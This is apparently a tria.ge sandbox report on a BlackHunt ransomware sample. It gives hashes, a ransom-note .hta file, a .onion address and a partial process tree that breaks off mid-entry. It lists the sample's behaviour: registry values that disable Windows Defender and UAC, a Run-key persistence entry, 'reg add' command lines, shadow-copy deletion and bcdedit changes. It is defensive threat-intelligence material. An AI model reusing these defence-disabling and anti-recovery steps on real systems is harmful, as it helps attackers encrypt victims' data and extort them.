Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
163s -
max time network
191s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 22:55
Static task
static1
Behavioral task
behavioral1
Sample
2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe
Resource
win10v2004-20231215-en
General
-
Target
2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe
-
Size
707KB
-
MD5
0bb343380cc42e730301f3371cc268cb
-
SHA1
18d67e93b4326c4ddea25829265407fd3571edab
-
SHA256
2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5
-
SHA512
d415f87deda54cb98b26ec33c25f626dd57e6996230288e2d739c8d1fe3e3b76605d267173d5fa93422fa06804c032050fd0ca669b27a4a3ccf56b1535615fbf
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1285vnh:6uaTmkZJ+naie5OTamgEoKxLW99h
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5752 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 5332 bcdedit.exe 5764 bcdedit.exe -
Renames multiple (715) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5768 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\W: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\I: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\E: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\A: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\X: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\Z: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\N: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\Y: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\P: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\K: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\V: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\B: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\R: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\U: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\G: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\S: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\H: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\J: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\M: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\O: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened (read-only) \??\L: 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\#BlackHunt_ReadMe.txt 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#BlackHunt_ReadMe.txt 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\winamp2.xml 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\#BlackHunt_ReadMe.txt 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\#BlackHunt_ReadMe.hta 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\Java\jre-1.8\lib\images\#BlackHunt_ReadMe.txt 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy.jar 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\#BlackHunt_ReadMe.hta 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\#BlackHunt_Private.key 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\#BlackHunt_ReadMe.hta 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\Java\jre-1.8\bin\server\#BlackHunt_Private.key 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\net.properties 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\plugins.dat 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\plugins\gui\#BlackHunt_ReadMe.hta 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\libpng.md 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\tzmappings 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\7-Zip\Lang\el.txt 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\Java\jre-1.8\bin\server\#BlackHunt_ReadMe.hta 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\locale\co\#BlackHunt_ReadMe.txt 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaTypewriterBold.ttf 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\#BlackHunt_Private.key 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libxml2.md 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_CopyNoDrop32x32.gif 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\management\jmxremote.access 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#BlackHunt_Private.key 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\Java\jre-1.8\legal\#BlackHunt_ReadMe.txt 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#BlackHunt_Private.key 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\Java\jre-1.8\lib\management\#BlackHunt_ReadMe.txt 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\dnsns.jar 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\cryptix.md 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\ecc.md 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\amd64\#BlackHunt_ReadMe.hta 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#BlackHunt_Private.key 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#BlackHunt_ReadMe.hta 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#BlackHunt_ReadMe.txt 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\#BlackHunt_Private.key 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\#BlackHunt_Private.key 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\7-Zip\Lang\ja.txt 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#BlackHunt_ReadMe.hta 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\index.html 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\blacklisted.certs 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#BlackHunt_ReadMe.txt 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Exp_RHP.aapp 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#BlackHunt_ReadMe.hta 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#BlackHunt_Private.key 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_filter\#BlackHunt_ReadMe.txt 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_output\#BlackHunt_ReadMe.hta 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\#BlackHunt_Private.key 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3232 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 676 vssadmin.exe 1776 vssadmin.exe 388 vssadmin.exe 1428 vssadmin.exe 5132 vssadmin.exe -
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe Token: SeRestorePrivilege 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe Token: SeBackupPrivilege 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe Token: SeTakeOwnershipPrivilege 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe Token: SeAuditPrivilege 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe Token: SeSecurityPrivilege 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe Token: SeIncBasePriorityPrivilege 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe Token: SeBackupPrivilege 5828 vssvc.exe Token: SeRestorePrivilege 5828 vssvc.exe Token: SeAuditPrivilege 5828 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4744 wrote to memory of 2476 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 88 PID 4744 wrote to memory of 2476 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 88 PID 4744 wrote to memory of 2236 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 90 PID 4744 wrote to memory of 2236 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 90 PID 4744 wrote to memory of 1996 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 92 PID 4744 wrote to memory of 1996 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 92 PID 4744 wrote to memory of 3596 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 179 PID 4744 wrote to memory of 3596 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 179 PID 4744 wrote to memory of 1336 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 94 PID 4744 wrote to memory of 1336 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 94 PID 1336 wrote to memory of 2056 1336 cmd.exe 163 PID 1336 wrote to memory of 2056 1336 cmd.exe 163 PID 1996 wrote to memory of 1792 1996 cmd.exe 164 PID 1996 wrote to memory of 1792 1996 cmd.exe 164 PID 3596 wrote to memory of 3816 3596 Conhost.exe 101 PID 3596 wrote to memory of 3816 3596 Conhost.exe 101 PID 2236 wrote to memory of 2960 2236 cmd.exe 100 PID 2236 wrote to memory of 2960 2236 cmd.exe 100 PID 2476 wrote to memory of 2892 2476 cmd.exe 98 PID 2476 wrote to memory of 2892 2476 cmd.exe 98 PID 4744 wrote to memory of 1412 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 103 PID 4744 wrote to memory of 1412 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 103 PID 4744 wrote to memory of 1672 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 105 PID 4744 wrote to memory of 1672 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 105 PID 4744 wrote to memory of 3624 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 107 PID 4744 wrote to memory of 3624 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 107 PID 1412 wrote to memory of 116 1412 cmd.exe 110 PID 1412 wrote to memory of 116 1412 cmd.exe 110 PID 4744 wrote to memory of 232 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 109 PID 4744 wrote to memory of 232 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 109 PID 1672 wrote to memory of 4840 1672 cmd.exe 113 PID 1672 wrote to memory of 4840 1672 cmd.exe 113 PID 4744 wrote to memory of 5048 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 112 PID 4744 wrote to memory of 5048 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 112 PID 4744 wrote to memory of 3064 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 122 PID 4744 wrote to memory of 3064 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 122 PID 4744 wrote to memory of 3264 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 116 PID 4744 wrote to memory of 3264 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 116 PID 4744 wrote to memory of 4940 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 121 PID 4744 wrote to memory of 4940 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 121 PID 3624 wrote to memory of 3368 3624 cmd.exe 120 PID 3624 wrote to memory of 3368 3624 cmd.exe 120 PID 4744 wrote to memory of 1740 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 119 PID 4744 wrote to memory of 1740 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 119 PID 4744 wrote to memory of 4000 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 126 PID 4744 wrote to memory of 4000 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 126 PID 4744 wrote to memory of 2136 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 124 PID 4744 wrote to memory of 2136 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 124 PID 4744 wrote to memory of 2252 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 128 PID 4744 wrote to memory of 2252 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 128 PID 4744 wrote to memory of 4528 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 129 PID 4744 wrote to memory of 4528 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 129 PID 4744 wrote to memory of 4864 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 130 PID 4744 wrote to memory of 4864 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 130 PID 4744 wrote to memory of 2000 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 135 PID 4744 wrote to memory of 2000 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 135 PID 4744 wrote to memory of 5052 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 137 PID 4744 wrote to memory of 5052 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 137 PID 4744 wrote to memory of 4244 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 138 PID 4744 wrote to memory of 4244 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 138 PID 4744 wrote to memory of 2228 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 140 PID 4744 wrote to memory of 2228 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 140 PID 4744 wrote to memory of 4960 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 144 PID 4744 wrote to memory of 4960 4744 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe 144 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe"C:\Users\Admin\AppData\Local\Temp\2f18be6210f93cfece7c4a31fc4047849d07a84ad74e8597da7048851f637de5.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4744 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
